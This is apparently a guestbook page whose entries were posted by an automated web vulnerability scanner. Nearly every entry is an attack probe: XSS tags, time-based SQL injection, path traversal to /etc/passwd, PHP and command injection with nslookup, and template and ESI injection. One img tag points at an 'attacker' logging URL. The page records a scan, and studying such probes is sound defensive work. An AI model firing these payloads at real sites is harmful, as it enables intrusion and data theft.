e [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 22:08:13

1

e [..] 2020-10-28 22:08:13

1

e [116.113.93.82] 2020-10-28 22:08:13

1

e [116.113.93.82] 2020-10-28 22:08:12

Array

e [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 22:08:12

1

e [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 22:08:11

1

e [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 22:08:11

1

e [116.113.93.82] 2020-10-28 22:08:11

1

e [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 22:08:10

1

e [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 22:08:10

1

e [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 22:08:10

1

e [116.113.93.82] 2020-10-28 22:08:09

1&n904026=v963078

e [116.113.93.82] 2020-10-28 22:08:09

1

e [116.113.93.82] 2020-10-28 22:08:09

1

e [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 22:08:09

1

e [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 22:08:09

1

e [116.113.93.82] 2020-10-28 22:08:09

Array

e ['"()] 2020-10-28 22:08:09

1

e [utaamJBC'));select pg_sleep(3); -- ] 2020-10-28 22:08:08

1

e [^(#$!@#$)(()))******] 2020-10-28 22:08:08

1

e [;print(md5(acunetix_wvs_security_test));] 2020-10-28 22:08:08

1

e [116.113.93.82] 2020-10-28 22:08:08

1

e [testasp.vulnweb.com] 2020-10-28 22:08:08

1

e [%2fetc%2fpasswd] 2020-10-28 22:08:08

1

e [116.113.93.82] 2020-10-28 22:08:07

Array

e [Array] 2020-10-28 22:08:07

1

e [b5JM9hwa');select pg_sleep(9); -- ] 2020-10-28 22:08:07

1

e [!(()&&!|*|*|] 2020-10-28 22:08:07

1

e [116.113.93.82] 2020-10-28 22:08:07

1

e [/etc/passwd] 2020-10-28 22:08:06

1

e [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 22:08:06

1

e [116.113.93.82] 2020-10-28 22:08:06

12345'"\'\");|]*{ <>

e [o4KeCobX';select pg_sleep(9); -- ] 2020-10-28 22:08:06

1

e [)] 2020-10-28 22:08:06

1

e [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 22:08:05

1

e [116.113.93.82&n973952=v939393] 2020-10-28 22:08:05

1

e [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 22:08:05

1

e [116.113.93.82] 2020-10-28 22:08:05

1

e [116.113.93.82] 2020-10-28 22:08:05

e [v1Dp71u4'; waitfor delay '0:0:6' -- ] 2020-10-28 22:08:05

1

e [1some_inexistent_file_with_long_name.82] 2020-10-28 22:08:05

1

e [116.113.93.82] 2020-10-28 22:08:04

1

e [1 waitfor delay '0:0:3' -- ] 2020-10-28 22:08:04

1

e [116.113.93.82] 2020-10-28 22:08:04

1

e [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 22:08:04

1

e [116.113.93.82] 2020-10-28 22:08:04

1

e [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 22:08:04

1

e [(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/] 2020-10-28 22:08:03

1

e [116.113.93.82] 2020-10-28 22:08:03

1

e [116.113.93.82] 2020-10-28 22:08:03

1

e [116.113.93.82] 2020-10-28 22:08:02

&nslookup w8gyJXpD&'\"`0&nslookup w8gyJXpD&`'

e [0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z] 2020-10-28 22:08:02

1

e [116.113.93.82] 2020-10-28 22:08:01

$(nslookup fKZerWZ1)

e [116.113.93.82] 2020-10-28 22:08:01

${9999856+9999241}

e [0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z] 2020-10-28 22:08:01

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 22:08:00

1

e [Array] 2020-10-28 22:08:00

1

e [116.113.93.82] 2020-10-28 22:08:00

set|set&set

e [if(now()=sysdate(),sleep(3),0)] 2020-10-28 22:07:59

1

e [Array] 2020-10-28 22:07:59

1

e [116.113.93.82] 2020-10-28 22:07:59

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

e [../../../../../../../../../../etc/passwd.82] 2020-10-28 22:07:59

1

e [116.113.93.82] 2020-10-28 22:07:59

"+response.write(9375275*9439736)+"

e [${10000357+9999597}] 2020-10-28 22:07:58

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 22:07:58

1

e [12345'"\'\");|]*{ <>] 2020-10-28 22:07:58

1

e [116.113.93.82] 2020-10-28 22:07:57

'+response.write(9375275*9439736)+'

e [116.113.93.82] 2020-10-28 22:07:57

1

e [-1" OR 2+363-363-1=0+0+0+1 -- ] 2020-10-28 22:07:57

1

e [../../../../../../../../../../../../../../../proc/version] 2020-10-28 22:07:57

1

e [] 2020-10-28 22:07:56

1

e [-1' OR 2+176-176-1=0+0+0+1 or 'MpO8cVrK'='] 2020-10-28 22:07:56

1

e [116.113.93.82] 2020-10-28 22:07:56

response.write(9375275*9439736)

e [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 22:07:56

1

e [116.113.93.82] 2020-10-28 22:07:55

71JWOSHt

e [-1' OR 2+655-655-1=0+0+0+1 -- ] 2020-10-28 22:07:55

1

e [&nslookup IPyPlKG2&'\"`0&nslookup IPyPlKG2&`'] 2020-10-28 22:07:55

1

e [../../../../../../../../../../etc/passwd] 2020-10-28 22:07:55

1

e [-1 OR 2+85-85-1=0+0+0+1] 2020-10-28 22:07:54

1

e [$(nslookup 7iCOPDCP)] 2020-10-28 22:07:54

1

e [-1 OR 2+70-70-1=0+0+0+1 -- ] 2020-10-28 22:07:54

1

e [e8RueZxO] 2020-10-28 22:07:54

1

e [set|set&set] 2020-10-28 22:07:53

1

e [dPzSrNoA] 2020-10-28 22:07:52

1

e [116.113.93.82] 2020-10-28 22:07:51

1

e ["+response.write(9859685*9032605)+"] 2020-10-28 22:07:51

1

e ['+response.write(9859685*9032605)+'] 2020-10-28 22:07:50

1

e [116.113.93.82] 2020-10-28 22:07:50

1

e [response.write(9859685*9032605)] 2020-10-28 22:07:49

1

e [116.113.93.82] 2020-10-28 22:07:23

1

e [116.113.93.82] 2020-10-28 22:07:19

1<RZ0LPE<

e [116.113.93.82] 2020-10-28 22:07:16

1<img sRc='http://attacker-9380/log.php?

e [116.113.93.82] 2020-10-28 22:07:13

1<wFpGsn x=9057>

e [116.113.93.82] 2020-10-28 22:07:09

1<ifRAme sRc=9202.com></IfRamE>

e [116.113.93.82] 2020-10-28 22:07:07

1<WWLD51>FXXRG[!+!]</WWLD51>

e [116.113.93.82] 2020-10-28 22:07:04

1Fpza1 <ScRiPt >88Aw(9332)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:07:01

1<% contenteditable onresize=88Aw(9049)>

e [116.113.93.82] 2020-10-28 22:06:59

1}body{acu:Expre/**/SSion(88Aw(9101))}

e [116.113.93.82] 2020-10-28 22:06:54

1<img<!-- --> src=x onerror=alert(9918);//><!-- -->

e [116.113.93.82] 2020-10-28 22:06:52

[url=http://www.vulnweb.com][/url]

e [116.113.93.82] 2020-10-28 22:06:49

<a HrEF=jaVaScRiPT:>

e [116.113.93.82] 2020-10-28 22:06:44

<a HrEF=http://www.vulnweb.com></a>

e [116.113.93.82] 2020-10-28 22:06:41

1<input autofocus onfocus=88Aw(9697)>

e [116.113.93.82] 2020-10-28 22:06:38

e [116.113.93.82] 2020-10-28 22:06:35

1<ScRiPt>88Aw(9905)</sCripT>

e [116.113.93.82] 2020-10-28 22:06:32

1\u003CScRiPt\88Aw(9474)\u003C/sCripT\u003E

e [116.113.93.82] 2020-10-28 22:06:29

%31%3C%53%63%52%69%50%74%20%3E%38%38%41%77%289237%29%3C%2F%73%43%72%69%70%54%3E

e [116.113.93.82] 2020-10-28 22:06:26

1<img/src=">" onerror=alert(9393)>

e [116.113.93.82] 2020-10-28 22:06:24

1<img src=xyz OnErRor=88Aw(9654)>

e [116.113.93.82] 2020-10-28 22:06:21

1<img src=//testasp.vulnweb.com/t/dot.gif onload=88Aw(9471)>

e [116.113.93.82] 2020-10-28 22:06:17

1<body onload=88Aw(9486)>

e [116.113.93.82] 2020-10-28 22:06:12

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9277'>

e [116.113.93.82] 2020-10-28 22:06:09

1<isindex type=image src=1 onerror=88Aw(9401)>

e [116.113.93.82] 2020-10-28 22:06:06

1<svg

e [116.113.93.82] 2020-10-28 22:06:04

1<video><source onerror="javascript:88Aw(9732)">

e [116.113.93.82] 2020-10-28 22:06:00

1<ScRiPt >88Aw(9062)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:05:56

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9551></ScRiPt>

e [116.113.93.82] 2020-10-28 22:05:54

1<ScRiPt >88Aw(9173)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:05:51

1<ScR<ScRiPt>IpT>88Aw(9326)</sCr<ScRiPt>IpT>

e [116.113.93.82] 2020-10-28 22:05:48

1<script>88Aw(9375)</script>

e [116.113.93.82] 2020-10-28 22:05:45

1<WVHL9B>E9GHJ[!+!]</WVHL9B>

e [116.113.93.82] 2020-10-28 22:05:43

1<ScRiPt >88Aw(9353)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:05:40

{{10000255*9999987}}

e [116.113.93.82] 2020-10-28 22:05:36

acux2953

e [116.113.93.82] 2020-10-28 22:05:34

acu3215<s1﹥s2ʺs3ʹuca3215

e [116.113.93.82] 2020-10-28 22:05:31

19315331

e [116.113.93.82] 2020-10-28 22:05:29

'"()&%<acx><ScRiPt >88Aw(9501)</ScRiPt>

e [116.113.93.82] 2020-10-28 22:05:24

1'"()&%<acx><ScRiPt >88Aw(9067)</ScRiPt>

e [116.113.93.82<TuLewb<] 2020-10-28 22:05:18

1

e [116.113.93.82<img sRc='http://attacker-9340/log.php?] 2020-10-28 22:05:15

1

e [116.113.93.82<RP4SZ9 x=9426>] 2020-10-28 22:05:12

1

e [116.113.93.82<ifRAme sRc=9262.com></IfRamE>] 2020-10-28 22:05:09

1

e [116.113.93.82<WDXPPY>S7ZBU[!+!]</WDXPPY>] 2020-10-28 22:05:05

1

e [116.113.93.82opmna <ScRiPt >88Aw(9889)</ScRiPt>] 2020-10-28 22:05:03

1

e [116.113.93.82<% contenteditable onresize=88Aw(9064)>] 2020-10-28 22:05:00

1

e [116.113.93.82}body{acu:Expre/**/SSion(88Aw(9525))}] 2020-10-28 22:04:57

1

e [116.113.93.82<img<!-- --> src=x onerror=alert(9251);//><!-- -->] 2020-10-28 22:04:54

1

e [[url=http://www.vulnweb.com][/url]] 2020-10-28 22:04:52

1

e [<a HrEF=jaVaScRiPT:>] 2020-10-28 22:04:49

1

e [<a HrEF=http://www.vulnweb.com></a>] 2020-10-28 22:04:45

1

e [116.113.93.82<input autofocus onfocus=88Aw(9374)>] 2020-10-28 22:04:44

1

e [] 2020-10-28 22:04:40

1

e [116.113.93.82<ScRiPt>88Aw(9401)</sCripT>] 2020-10-28 22:04:37

1

e [116.113.93.82\u003CScRiPt\88Aw(9735)\u003C/sCripT\u003E] 2020-10-28 22:04:35

1

e [%31%31%36%2E%31%31%33%2E%39%33%2E%38%32%3C%53%63%52%69%50%74%20%3E%38%38%41%77%289262%29%3C%2F%73%43%72%69%70%54%3E] 2020-10-28 22:04:32

1

e [116.113.93.82<img/src=">" onerror=alert(9851)>] 2020-10-28 22:04:29

1

e [116.113.93.82<img src=xyz OnErRor=88Aw(9602)>] 2020-10-28 22:04:26

1

e [116.113.93.82<img src=//testasp.vulnweb.com/t/dot.gif onload=88Aw(9424)>] 2020-10-28 22:04:24

1

e [116.113.93.82<body onload=88Aw(9993)>] 2020-10-28 22:04:21

1

e [116.113.93.82] 2020-10-28 22:04:19

1

e [116.113.93.82<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9213'>] 2020-10-28 22:04:18

1

e [116.113.93.82<isindex type=image src=1 onerror=88Aw(9343)>] 2020-10-28 22:04:15

1

e [116.113.93.82] 2020-10-28 22:04:13

1

e [116.113.93.82<svg ] 2020-10-28 22:04:13

1

e [116.113.93.82] 2020-10-28 22:04:12

1

e [116.113.93.82] 2020-10-28 22:04:10

lXmLXcK7'));select pg_sleep(3); --

e [116.113.93.82<video><source onerror="javascript:88Aw(9201)">] 2020-10-28 22:04:10

1

e [116.113.93.82] 2020-10-28 22:04:09

MTZyHNOW');select pg_sleep(9); --

e [116.113.93.82] 2020-10-28 22:04:08

nV1yFEdZ';select pg_sleep(6); --

e [116.113.93.82] 2020-10-28 22:04:07

-1));select pg_sleep(6); --

e [116.113.93.82<ScRiPt >88Aw(9962)</ScRiPt>] 2020-10-28 22:04:07

1

e [116.113.93.82] 2020-10-28 22:04:06

WEB-INF\web.xml

e [116.113.93.82] 2020-10-28 22:04:06

-1);select pg_sleep(3); --

e [116.113.93.82] 2020-10-28 22:04:05

WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 22:04:05

-1;select pg_sleep(9); --

e [116.113.93.82<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9449></ScRiPt>] 2020-10-28 22:04:04

1

e [116.113.93.82] 2020-10-28 22:04:04

/WEB-INF/web.xml

e [116.113.93.82] 2020-10-28 22:04:04

J1DDW6lx'; waitfor delay '0:0:9' --

e [116.113.93.82] 2020-10-28 22:04:03

/\../\../\../\../\../\../\../etc/passwd

e [116.113.93.82] 2020-10-28 22:04:03

1 waitfor delay '0:0:6' --

e [116.113.93.82] 2020-10-28 22:04:02

file:///etc/passwd

e [116.113.93.82] 2020-10-28 22:04:02

-1); waitfor delay '0:0:3' --

e [116.113.93.82<ScRiPt >88Aw(9293)</ScRiPt>] 2020-10-28 22:04:01

1

e [116.113.93.82] 2020-10-28 22:04:00

invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././.

e [116.113.93.82] 2020-10-28 22:04:00

-1; waitfor delay '0:0:3' --

e [116.113.93.82] 2020-10-28 22:04:00

..

e [116.113.93.82] 2020-10-28 22:03:59

(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/

e [116.113.93.82] 2020-10-28 22:03:58

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd

e [116.113.93.82<ScR<ScRiPt>IpT>88Aw(9920)</sCr<ScRiPt>IpT>] 2020-10-28 22:03:58

1

e [116.113.93.82] 2020-10-28 22:03:58

0"XOR(if(now()=sysdate(),sleep(6),0))XOR"Z

e [116.113.93.82] 2020-10-28 22:03:57

../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd

e [116.113.93.82] 2020-10-28 22:03:55

/.././.././.././.././.././.././.././../etc/./passwd%00

e [116.113.93.82<script>88Aw(9638)</script>] 2020-10-28 22:03:55

1

e [116.113.93.82] 2020-10-28 22:03:55

0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z

e [116.113.93.82] 2020-10-28 22:03:55

%2fetc%2fpasswd

e [116.113.93.82] 2020-10-28 22:03:54

if(now()=sysdate(),sleep(3),0)

e [116.113.93.82] 2020-10-28 22:03:54

/etc/passwd

e [116.113.93.82] 2020-10-28 22:03:53

-1" OR 2+658-658-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 22:03:53

.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd

e [116.113.93.82<WFQREG>P3I6E[!+!]</WFQREG>] 2020-10-28 22:03:52

1

e [116.113.93.82] 2020-10-28 22:03:52

-1' OR 2+41-41-1=0+0+0+1 or 'clJYUNnd'='

e [116.113.93.82] 2020-10-28 22:03:52

/../..//../..//../..//../..//../..//etc/passwd.jpg

e [116.113.93.82] 2020-10-28 22:03:51

-1' OR 2+621-621-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 22:03:50

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.jpg

e [116.113.93.82] 2020-10-28 22:03:50

-1 OR 2+229-229-1=0+0+0+1

e [116.113.93.82] 2020-10-28 22:03:49

../../../../../../../../../../etc/passwd.jpg

e [116.113.93.82] 2020-10-28 22:03:49

-1 OR 2+117-117-1=0+0+0+1 --

e [116.113.93.82] 2020-10-28 22:03:48

..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

e [116.113.93.82<ScRiPt >88Aw(9256)</ScRiPt>] 2020-10-28 22:03:48

1

e [116.113.93.82] 2020-10-28 22:03:47

cdGJCPgY

e [116.113.93.82] 2020-10-28 22:03:47

../../../../../../../../../../../../../../../proc/version

e [116.113.93.82] 2020-10-28 22:03:47

e [116.113.93.82] 2020-10-28 22:03:46

1

e [116.113.93.82] 2020-10-28 22:03:46

../../../../../../../../../../etc/passwd

e [116.113.93.82] 2020-10-28 22:03:46

e [{{9999729*9999385}}] 2020-10-28 22:03:45

1

e [116.113.93.82] 2020-10-28 22:03:45

1

e [116.113.93.82] 2020-10-28 22:03:45

JyI=

e [116.113.93.82] 2020-10-28 22:03:44

@@oePl4

e [116.113.93.82] 2020-10-28 22:03:43

1

e [acux2539] 2020-10-28 22:03:43

1

e [116.113.93.82] 2020-10-28 22:03:42

\

e [116.113.93.82] 2020-10-28 22:03:41

1'"

e [acu4059<s1﹥s2ʺs3ʹuca4059] 2020-10-28 22:03:40

1

e [116.113.93.829475095] 2020-10-28 22:03:36

1

e [116.113.93.82] 2020-10-28 22:03:35

<!--

e [116.113.93.82] 2020-10-28 22:03:34

'"

e ['"()&%<acx><ScRiPt >88Aw(9844)</ScRiPt>] 2020-10-28 22:03:34

1

e [116.113.93.82] 2020-10-28 22:03:33

${@print(md5(acunetix_wvs_security_test))}\

e [] 2020-10-28 22:03:33

1

e [116.113.93.82] 2020-10-28 22:03:32

${@print(md5(acunetix_wvs_security_test))}

e [] 2020-10-28 22:03:31

1

e [116.113.93.82'"()&%<acx><ScRiPt >88Aw(9388)</ScRiPt>] 2020-10-28 22:03:31

1

e [116.113.93.82] 2020-10-28 22:03:31

";print(md5(acunetix_wvs_security_test));$a="

e [<!--] 2020-10-28 22:03:31

1

e [JyI=] 2020-10-28 22:03:30

1

e [116.113.93.82] 2020-10-28 22:03:30

';print(md5(acunetix_wvs_security_test));$a='

e ['"] 2020-10-28 22:03:30

1

e [116.113.93.82] 2020-10-28 22:03:29

/www.vulnweb.com

e [116.113.93.82] 2020-10-28 22:03:29

testasp.vulnweb.com

e [@@LnDbM] 2020-10-28 22:03:29

1

e [116.113.93.82] 2020-10-28 22:03:29

http://hit9rHdYWemGW.bxss.me/

e [116.113.93.82] 2020-10-28 22:03:29

create/.

e [116.113.93.82] 2020-10-28 22:03:29

;print(md5(acunetix_wvs_security_test));

e [116.113.93.82] 2020-10-28 22:03:29

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

e [116.113.93.82] 2020-10-28 22:03:28

http://testasp.vulnweb.com/t/fit.txt?.jpg

e [1] 2020-10-28 22:03:28

1

e [116.113.93.82] 2020-10-28 22:03:28

create

e [/www.vulnweb.com] 2020-10-28 22:03:27

1

e [116.113.93.82] 2020-10-28 22:03:27

Http://testasp.vulnweb.com/t/fit.txt

e [\] 2020-10-28 22:03:26

1

e [116.113.93.82] 2020-10-28 22:03:26

create

e [)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))] 2020-10-28 22:03:26

1

e [http://hitj9Iewna9Wj.bxss.me/] 2020-10-28 22:03:26

1

e [116.113.93.82] 2020-10-28 22:03:25

1some_inexistent_file_with_long_name.jpg

e [1'"] 2020-10-28 22:03:25

1

e [116.113.93.82] 2020-10-28 22:03:25

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

e [116.113.93.82] 2020-10-28 22:03:24

^(#$!@#$)(()))******

e [WEB-INF\web.xml] 2020-10-28 22:03:24

1

e [116.113.93.82] 2020-10-28 22:03:24

1

e [116.113.93.82] 2020-10-28 22:03:24

testasp.vulnweb.com/t/xss.html?%00

e [116.113.93.82] 2020-10-28 22:03:24

!(()&&!|*|*|

e [116.113.93.82] 2020-10-28 22:03:24

1

e [WEB-INF/web.xml] 2020-10-28 22:03:24

1

e [116.113.93.82] 2020-10-28 22:03:23

1

e [116.113.93.82] 2020-10-28 22:03:23

HttP://testasp.vulnweb.com/t/xss.html?%00

e [${@print(md5(acunetix_wvs_security_test))}\] 2020-10-28 22:03:23

1

e [116.113.93.82] 2020-10-28 22:03:23

)

e [116.113.93.82] 2020-10-28 22:03:23

'"()

e [create/.] 2020-10-28 22:03:23

1

e [/WEB-INF/web.xml] 2020-10-28 22:03:23

1

e [rkSp0i5i'));select pg_sleep(9); -- ] 2020-10-28 22:03:22

1

e [${@print(md5(acunetix_wvs_security_test))}] 2020-10-28 22:03:22

1

e [create] 2020-10-28 22:03:22

1

e [/\../\../\../\../\../\../\../etc/passwd] 2020-10-28 22:03:21

1

e [6guoMdNQ');select pg_sleep(9); -- ] 2020-10-28 22:03:21

1

e [116.113.93.82] 2020-10-28 22:03:21

1&n979515=v936586

e [";print(md5(acunetix_wvs_security_test));$a="] 2020-10-28 22:03:20

1

e [file:///etc/passwd] 2020-10-28 22:03:20

1

e [zvhZl3hW';select pg_sleep(6); -- ] 2020-10-28 22:03:20

1

e [create] 2020-10-28 22:03:20

1

e [testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 22:03:20

1

e [116.113.93.82] 2020-10-28 22:03:20

Array

e [116.113.93.82] 2020-10-28 22:03:20

Array

e [';print(md5(acunetix_wvs_security_test));$a='] 2020-10-28 22:03:20

1

e [invalid../../../../../../../../../../etc/passwd/././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././././] 2020-10-28 22:03:19

1

e [116.113.93.82] 2020-10-28 22:03:19

Array

e [IXc2zdat'; waitfor delay '0:0:3' -- ] 2020-10-28 22:03:19

1

e [HttP://testasp.vulnweb.com/t/xss.html?%00] 2020-10-28 22:03:19

1

e [testasp.vulnweb.com] 2020-10-28 22:03:19

1

e [;print(md5(acunetix_wvs_security_test));] 2020-10-28 22:03:18

1

e [..] 2020-10-28 22:03:18

1

e [^(#$!@#$)(()))******] 2020-10-28 22:03:18

1

e [116.113.93.82] 2020-10-28 22:03:18

12345'"\'\");|]*{ <>

e [1 waitfor delay '0:0:3' -- ] 2020-10-28 22:03:18

1

e [http://testasp.vulnweb.com/t/fit.txt?.82] 2020-10-28 22:03:17

1

e [../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././etc/passwd] 2020-10-28 22:03:17

1

e ['"()] 2020-10-28 22:03:16

1

e [116.113.93.82] 2020-10-28 22:03:16

e [(select(0)from(select(sleep(9)))v)/*'+(select(0)from(select(sleep(9)))v)+'"+(select(0)from(select(sleep(9)))v)+"*/] 2020-10-28 22:03:16

1

e [Http://testasp.vulnweb.com/t/fit.txt] 2020-10-28 22:03:16

1

e [!(()&&!|*|*|] 2020-10-28 22:03:16

1

e [../..//../..//../..//../..//../..//../..//../..//../..//etc/passwd] 2020-10-28 22:03:16

1

e [Array] 2020-10-28 22:03:15

1

e [1some_inexistent_file_with_long_name.82] 2020-10-28 22:03:15

1

e [0"XOR(if(now()=sysdate(),sleep(9),0))XOR"Z] 2020-10-28 22:03:15

1

e [)] 2020-10-28 22:03:15

1

e [116.113.93.82&n973891=v956238] 2020-10-28 22:03:15

1

e [/.././.././.././.././.././.././.././../etc/./passwd%00] 2020-10-28 22:03:15

1

e [116.113.93.82] 2020-10-28 22:03:14

"+response.write(9614703*9551309)+"

e [0'XOR(if(now()=sysdate(),sleep(6),0))XOR'Z] 2020-10-28 22:03:14

1

e [http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.82] 2020-10-28 22:03:14

1

e [%2fetc%2fpasswd] 2020-10-28 22:03:14

1

e [116.113.93.82] 2020-10-28 22:03:14

&nslookup zGOU3LpY&'\"`0&nslookup zGOU3LpY&`'

e [116.113.93.82] 2020-10-28 22:03:14

'+response.write(9614703*9551309)+'

e [116.113.93.82] 2020-10-28 22:03:14

${9999068+9999035}

e [if(now()=sysdate(),sleep(6),0)] 2020-10-28 22:03:14

1

e [/etc/passwd] 2020-10-28 22:03:13

1

e [116.113.93.82] 2020-10-28 22:03:13

1

e [116.113.93.82] 2020-10-28 22:03:13

response.write(9614703*9551309)

e [116.113.93.82] 2020-10-28 22:03:13

$(nslookup Un9W8asm)

e [-1" OR 2+586-586-1=0+0+0+1 -- ] 2020-10-28 22:03:12

1

e [.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd] 2020-10-28 22:03:12

1

e [Array] 2020-10-28 22:03:12

1

e [116.113.93.82] 2020-10-28 22:03:12

1<esi:include src="http://testasp.vulnweb.com/rpb.png"/>

e [116.113.93.82] 2020-10-28 22:03:12

set|set&set

e [-1' OR 2+802-802-1=0+0+0+1 or 'csmsd67d'='] 2020-10-28 22:03:11

1

e [Array] 2020-10-28 22:03:11

1

e [/../..//../..//../..//../..//../..//etc/passwd.82] 2020-10-28 22:03:11

1

e [-1' OR 2+784-784-1=0+0+0+1 -- ] 2020-10-28 22:03:10

1

e [${10000324+9999393}] 2020-10-28 22:03:10

1

e [116.113.93.82<esi:include src="http://testasp.vulnweb.com/rpb.png"/>] 2020-10-28 22:03:10

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00.82] 2020-10-28 22:03:10

1

e [12345'"\'\");|]*{ <>] 2020-10-28 22:03:09

1

e [-1 OR 2+727-727-1=0+0+0+1] 2020-10-28 22:03:09

1

e [../../../../../../../../../../etc/passwd.82] 2020-10-28 22:03:09

1

e [] 2020-10-28 22:03:08

1

e [-1 OR 2+784-784-1=0+0+0+1 -- ] 2020-10-28 22:03:08

1

e [..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd] 2020-10-28 22:03:07

1

e [116.113.93.82] 2020-10-28 22:03:07

RZW4dVJv

e [&nslookup t8v3obuH&'\"`0&nslookup t8v3obuH&`'] 2020-10-28 22:03:07

1

e [fXUp6NzU] 2020-10-28 22:03:06

1

e ["+response.write(9152770*9140210)+"] 2020-10-28 22:03:06

1

e [../../../../../../../../../../../../../../../proc/version] 2020-10-28 22:03:06

1

e [$(nslookup BMVKWm6Q)] 2020-10-28 22:03:06

1

e [116.113.93.82] 2020-10-28 22:03:05

1

e ['+response.write(9152770*9140210)+'] 2020-10-28 22:03:05

1

e [../../../../../../../../../../etc/passwd] 2020-10-28 22:03:05

1

e [JZymuIKT] 2020-10-28 22:03:05

1

e [set|set&set] 2020-10-28 22:03:05

1

e [116.113.93.82] 2020-10-28 22:03:05

1

e [response.write(9152770*9140210)] 2020-10-28 22:03:05

1

e [116.113.93.82] 2020-10-28 22:00:03

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:34:23

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:34:20

1

GRLpGpAG [116.113.93.82] 2020-10-28 20:34:17

1

GRLpGpAG"><script>93vd(9513)</script> [116.113.93.82] 2020-10-28 20:34:15

1

